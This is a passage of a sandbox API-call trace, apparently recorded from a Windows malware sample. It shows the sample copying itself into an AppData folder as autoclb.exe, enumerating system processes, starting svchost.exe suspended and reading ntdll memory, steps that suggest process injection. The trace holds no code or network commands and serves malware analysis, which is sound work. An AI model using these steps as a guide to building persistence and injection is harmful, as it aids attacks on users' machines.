lpString2="\\Software\\Microsoft\\Windows\\CurrentVersion" | out: lpString1="S-1-5-21-1462094071-1423818996-289466292-1000\\Software\\Microsoft\\Windows\\CurrentVersion") returned="S-1-5-21-1462094071-1423818996-289466292-1000\\Software\\Microsoft\\Windows\\CurrentVersion" [0206.615] lstrcatA (in: lpString1="S-1-5-21-1462094071-1423818996-289466292-1000\\Software\\Microsoft\\Windows\\CurrentVersion", lpString2="\\Explorer\\Shell Folders" | out: lpString1="S-1-5-21-1462094071-1423818996-289466292-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders") returned="S-1-5-21-1462094071-1423818996-289466292-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders" [0206.615] RegOpenKeyA (in: hKey=0x1d8, lpSubKey="S-1-5-21-1462094071-1423818996-289466292-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", phkResult=0x1eafe90 | out: phkResult=0x1eafe90*=0x1dc) returned 0x0 [0206.615] RegQueryValueExW (in: hKey=0x1dc, lpValueName="AppData", lpReserved=0x0, lpType=0x1eafe8c, lpData=0x0, lpcbData=0x1eafe98*=0xfffffffe | out: lpType=0x1eafe8c*=0x1, lpData=0x0, lpcbData=0x1eafe98*=0x4c) returned 0x0 [0206.615] lstrlenW (lpString="autoclb.exe") returned 11 [0206.615] RegQueryValueExW (in: hKey=0x1dc, lpValueName="AppData", lpReserved=0x0, lpType=0x1eafe8c, lpData=0x23c8c60, lpcbData=0x1eafe98*=0x4c | out: lpType=0x1eafe8c*=0x1, lpData="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming", lpcbData=0x1eafe98*=0x4c) returned 0x0 [0206.615] PathCombineW (in: pszDest=0x23c8c60, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming", pszFile="adsldraw" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw" [0206.615] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adsldraw"), lpSecurityAttributes=0x0) returned 0 [0206.616] PathCombineW (in: pszDest=0x23c8c60, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw", pszFile="autoclb.exe" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe" [0206.616] lstrcmpiW (lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe", lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe") returned 0 [0206.616] RegCloseKey (hKey=0x1dc) returned 0x0 [0206.616] RegCloseKey (hKey=0x1d8) returned 0x0 [0206.616] StrChrW (lpStart="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe\" ", wMatch=0x22) returned="\" " [0206.616] StrChrW (lpStart="\" ", wMatch=0x20) returned=" " [0206.616] lstrlenW (lpString=" ") returned 1 [0206.616] StrTrimW (in: psz=" ", pszTrimChars=" \x09\"" | out: psz="") returned 1 [0206.630] RtlUpcaseUnicodeString (DestinationString="\xf88b\xff81\x04\xc000\xce74\x5eb\x9abf", SourceString="System", AllocateDestinationString=1) returned 0x0 [0206.630] RtlFreeAnsiString (AnsiString="S") [0206.630] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="smss.exe", AllocateDestinationString=1) returned 0x0 [0206.630] RtlFreeAnsiString (AnsiString="S") [0206.630] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="csrss.exe", AllocateDestinationString=1) returned 0x0 [0206.630] RtlFreeAnsiString (AnsiString="C") [0206.630] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="csrss.exe", AllocateDestinationString=1) returned 0x0 [0206.630] RtlFreeAnsiString (AnsiString="C") [0206.630] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="winlogon.exe", AllocateDestinationString=1) returned 0x0 [0206.630] RtlFreeAnsiString (AnsiString="W") [0206.630] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="wininit.exe", AllocateDestinationString=1) returned 0x0 [0206.630] RtlFreeAnsiString (AnsiString="W") [0206.630] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="services.exe", AllocateDestinationString=1) returned 0x0 [0206.630] RtlFreeAnsiString (AnsiString="S") [0206.630] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="lsass.exe", AllocateDestinationString=1) returned 0x0 [0206.630] RtlFreeAnsiString (AnsiString="L") [0206.630] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0206.630] RtlFreeAnsiString (AnsiString="S") [0206.630] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0206.630] RtlFreeAnsiString (AnsiString="S") [0206.630] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="dwm.exe", AllocateDestinationString=1) returned 0x0 [0206.630] RtlFreeAnsiString (AnsiString="D") [0206.630] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0206.630] RtlFreeAnsiString (AnsiString="S") [0206.630] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0206.631] RtlFreeAnsiString (AnsiString="S") [0206.631] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0206.631] RtlFreeAnsiString (AnsiString="S") [0206.631] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0206.631] RtlFreeAnsiString (AnsiString="S") [0206.631] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0206.631] RtlFreeAnsiString (AnsiString="S") [0206.631] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0206.631] RtlFreeAnsiString (AnsiString="S") [0206.631] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="spoolsv.exe", AllocateDestinationString=1) returned 0x0 [0206.631] RtlFreeAnsiString (AnsiString="S") [0206.631] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0206.631] RtlFreeAnsiString (AnsiString="S") [0206.631] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0206.631] RtlFreeAnsiString (AnsiString="S") [0206.631] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="OfficeClickToRun.exe", AllocateDestinationString=1) returned 0x0 [0206.631] RtlFreeAnsiString (AnsiString="O") [0206.631] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0206.631] RtlFreeAnsiString (AnsiString="S") [0206.631] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="sihost.exe", AllocateDestinationString=1) returned 0x0 [0206.631] RtlFreeAnsiString (AnsiString="S") [0206.631] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="taskhostw.exe", AllocateDestinationString=1) returned 0x0 [0206.631] RtlFreeAnsiString (AnsiString="T") [0206.631] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="explorer.exe", AllocateDestinationString=1) returned 0x0 [0206.631] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x766f0000 [0206.632] GetProcAddress (hModule=0x766f0000, lpProcName="GetWindowThreadProcessId") returned 0x7670ba70 [0206.632] FindWindowA (lpClassName="ProgMan", lpWindowName=0x0) returned 0x100dc [0206.632] GetWindowThreadProcessId (in: hWnd=0x100dc, lpdwProcessId=0x1eafeb4 | out: lpdwProcessId=0x1eafeb4) returned 0x838 [0206.632] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x834) returned 0x1d8 [0206.632] IsWow64Process (in: hProcess=0x1d8, Wow64Process=0x1eafe80 | out: Wow64Process=0x1eafe80) returned 1 [0206.632] CloseHandle (hObject=0x1d8) returned 1 [0206.632] ExpandEnvironmentStringsA (in: lpSrc="%systemroot%\\system32\\svchost.exe", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x21 [0206.632] ExpandEnvironmentStringsA (in: lpSrc="%systemroot%\\system32\\svchost.exe", lpDst=0x23c8ae8, nSize=0x21 | out: lpDst="C:\\Windows\\system32\\svchost.exe") returned 0x20 [0206.633] GetModuleHandleA (lpModuleName="KERNEL32.DLL") returned 0x74d70000 [0206.633] GetProcAddress (hModule=0x74d70000, lpProcName="Wow64EnableWow64FsRedirection") returned 0x74dab6a0 [0206.633] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=0) returned 1 [0206.633] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\svchost.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1eafe58*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1eafea0 | out: lpCommandLine="C:\\Windows\\system32\\svchost.exe", lpProcessInformation=0x1eafea0*(hProcess=0x1dc, hThread=0x1d8, dwProcessId=0x198, dwThreadId=0x1c4)) returned 1 [0206.639] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=1) returned 1 [0206.640] IsWow64Process (in: hProcess=0x1dc, Wow64Process=0x1eafb38 | out: Wow64Process=0x1eafb38) returned 1 [0206.640] RtlGetVersion (in: lpVersionInformation=0x1eaf518 | out: lpVersionInformation=0x1eaf518*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x2800, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0206.640] GetCurrentProcessId () returned 0x51c [0206.640] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x51c) returned 0x1e4 [0206.640] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x779b0000 [0206.640] GetProcAddress (hModule=0x779b0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77a1a840 [0206.640] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1e4, ProcessInformationClass=0x0, ProcessInformation64=0x1eaf414, ProcessInformationLength=0x30, ReturnLength=0x1eaf468 | out: ProcessInformation64=0x1eaf414, ReturnLength=0x1eaf468) returned 0x0 [0206.640] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x779b0000 [0206.640] GetProcAddress (hModule=0x779b0000, lpProcName="ZwWow64ReadVirtualMemory64") returned 0x77a1a860 [0206.640] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7ffdf000, Buffer=0x0, BufferSize=0x2343cc0, NumberOfBytesRead=0x28 | out: Buffer=0x0, NumberOfBytesRead=0x28) returned 0x0 [0206.640] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x780761c0, Buffer=0x7ff9, BufferSize=0x2343ce8, NumberOfBytesRead=0x40 | out: Buffer=0x7ff9, NumberOfBytesRead=0x40) returned 0x0 [0206.640] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x201d40, Buffer=0x0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0206.640] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x201bc0, Buffer=0x0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0206.640] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x2021e0, Buffer=0x0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0206.640] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x2024c0, Buffer=0x0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0206.640] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x202690, Buffer=0x0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0206.640] VirtualAlloc (lpAddress=0x0, dwSize=0x5a4, flAllocationType=0x3000, flProtect=0x4) returned 0x160000 [0206.641] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x779b0000 [0206.641] GetProcAddress (hModule=0x779b0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77a1a840 [0206.641] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1e4, ProcessInformationClass=0x0, ProcessInformation64=0x1eaf414, ProcessInformationLength=0x30, ReturnLength=0x1eaf468 | out: ProcessInformation64=0x1eaf414, ReturnLength=0x1eaf468) returned 0x0 [0206.641] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7ffdf000, Buffer=0x0, BufferSize=0x2343cc0, NumberOfBytesRead=0x28 | out: Buffer=0x0, NumberOfBytesRead=0x28) returned 0x0 [0206.641] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x780761c0, Buffer=0x7ff9, BufferSize=0x2343ce8, NumberOfBytesRead=0x40 | out: Buffer=0x7ff9, NumberOfBytesRead=0x40) returned 0x0 [0206.641] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x201d40, Buffer=0x0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0206.641] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x201928, Buffer=0x0, BufferSize=0x2343ab8, NumberOfBytesRead=0x74 | out: Buffer=0x0, NumberOfBytesRead=0x74) returned 0x0 [0206.641] StrRChrA (lpStart="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe", lpEnd=0x0, wMatch=0x5c) returned="\\autoclb.exe" [0206.641] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x201bc0, Buffer=0x0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0206.641] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x201ac0, Buffer=0x0, BufferSize=0x2343ab8, NumberOfBytesRead=0x3a | out: Buffer=0x0, NumberOfBytesRead=0x3a) returned 0x0 [0206.641] StrRChrA (lpStart="C:\\Windows\\SYSTEM32\\ntdll.dll", lpEnd=0x0, wMatch=0x5c) returned="\\ntdll.dll" [0206.641] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x2021e0, Buffer=0x0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0206.641] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x202360, Buffer=0x0, BufferSize=0x2343ab8, NumberOfBytesRead=0x3a | out: Buffer=0x0, NumberOfBytesRead=0x3a) returned 0x0 [0206.641] StrRChrA (lpStart="C:\\Windows\\system32\\wow64.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64.dll" [0206.641] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x2024c0, Buffer=0x0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0206.641] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x202640, Buffer=0x0, BufferSize=0x2343ab8, NumberOfBytesRead=0x40 | out: Buffer=0x0, NumberOfBytesRead=0x40) returned 0x0 [0206.641] StrRChrA (lpStart="C:\\Windows\\system32\\wow64win.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64win.dll" [0206.641] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x202690, Buffer=0x0, BufferSize=0x2343d28, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0206.641] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x202160, Buffer=0x0, BufferSize=0x2343ab8, NumberOfBytesRead=0x40 | out: Buffer=0x0, NumberOfBytesRead=0x40) returned 0x0 [0206.641] StrRChrA (lpStart="C:\\Windows\\system32\\wow64cpu.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64cpu.dll" [0206.641] lstrcmpiA (lpString1="autoclb.exe", lpString2="NTDLL.DLL") returned -1 [0206.641] StrChrA (lpStart="autoclb.exe", wMatch=0x2e) returned=".exe" [0206.641] lstrcmpiA (lpString1="autoclb", lpString2="NTDLL.DLL") returned -1 [0206.641] lstrcmpiA (lpString1="ntdll.dll", lpString2="NTDLL.DLL") returned 0 [0206.641] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.642] VirtualAlloc (lpAddress=0x0, dwSize=0x1c2000, flAllocationType=0x3000, flProtect=0x4) returned 0x2720000 [0206.642] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f30000, Buffer=0x7ff9, BufferSize=0x2720000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.642] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f31000, Buffer=0x7ff9, BufferSize=0x2721000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.642] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f32000, Buffer=0x7ff9, BufferSize=0x2722000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.642] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f33000, Buffer=0x7ff9, BufferSize=0x2723000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.642] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f34000, Buffer=0x7ff9, BufferSize=0x2724000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.642] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f35000, Buffer=0x7ff9, BufferSize=0x2725000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.642] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f36000, Buffer=0x7ff9, BufferSize=0x2726000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.642] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f37000, Buffer=0x7ff9, BufferSize=0x2727000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.643] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f38000, Buffer=0x7ff9, BufferSize=0x2728000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.643] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f39000, Buffer=0x7ff9, BufferSize=0x2729000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.643] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f3a000, Buffer=0x7ff9, BufferSize=0x272a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.643] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f3b000, Buffer=0x7ff9, BufferSize=0x272b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.643] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f3c000, Buffer=0x7ff9, BufferSize=0x272c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.643] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f3d000, Buffer=0x7ff9, BufferSize=0x272d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.643] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f3e000, Buffer=0x7ff9, BufferSize=0x272e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.643] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f3f000, Buffer=0x7ff9, BufferSize=0x272f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.644] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f40000, Buffer=0x7ff9, BufferSize=0x2730000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.644] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f41000, Buffer=0x7ff9, BufferSize=0x2731000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.644] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f42000, Buffer=0x7ff9, BufferSize=0x2732000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.644] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f43000, Buffer=0x7ff9, BufferSize=0x2733000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.644] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f44000, Buffer=0x7ff9, BufferSize=0x2734000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.644] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f45000, Buffer=0x7ff9, BufferSize=0x2735000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.644] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f46000, Buffer=0x7ff9, BufferSize=0x2736000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.644] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f47000, Buffer=0x7ff9, BufferSize=0x2737000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.644] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f48000, Buffer=0x7ff9, BufferSize=0x2738000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.644] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f49000, Buffer=0x7ff9, BufferSize=0x2739000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.645] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f4a000, Buffer=0x7ff9, BufferSize=0x273a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.645] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f4b000, Buffer=0x7ff9, BufferSize=0x273b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.645] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f4c000, Buffer=0x7ff9, BufferSize=0x273c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.645] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f4d000, Buffer=0x7ff9, BufferSize=0x273d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.645] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f4e000, Buffer=0x7ff9, BufferSize=0x273e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.645] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f4f000, Buffer=0x7ff9, BufferSize=0x273f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.645] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f50000, Buffer=0x7ff9, BufferSize=0x2740000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.645] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f51000, Buffer=0x7ff9, BufferSize=0x2741000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.645] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f52000, Buffer=0x7ff9, BufferSize=0x2742000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.646] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f53000, Buffer=0x7ff9, BufferSize=0x2743000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.646] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f54000, Buffer=0x7ff9, BufferSize=0x2744000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.646] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f55000, Buffer=0x7ff9, BufferSize=0x2745000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.646] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f56000, Buffer=0x7ff9, BufferSize=0x2746000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.646] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f57000, Buffer=0x7ff9, BufferSize=0x2747000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.646] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f58000, Buffer=0x7ff9, BufferSize=0x2748000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.646] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f59000, Buffer=0x7ff9, BufferSize=0x2749000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.646] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77f5a000, Buffer=0x7ff9, BufferSize=0x274a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.646] NtWow64ReadVirtualMemory64 (in: 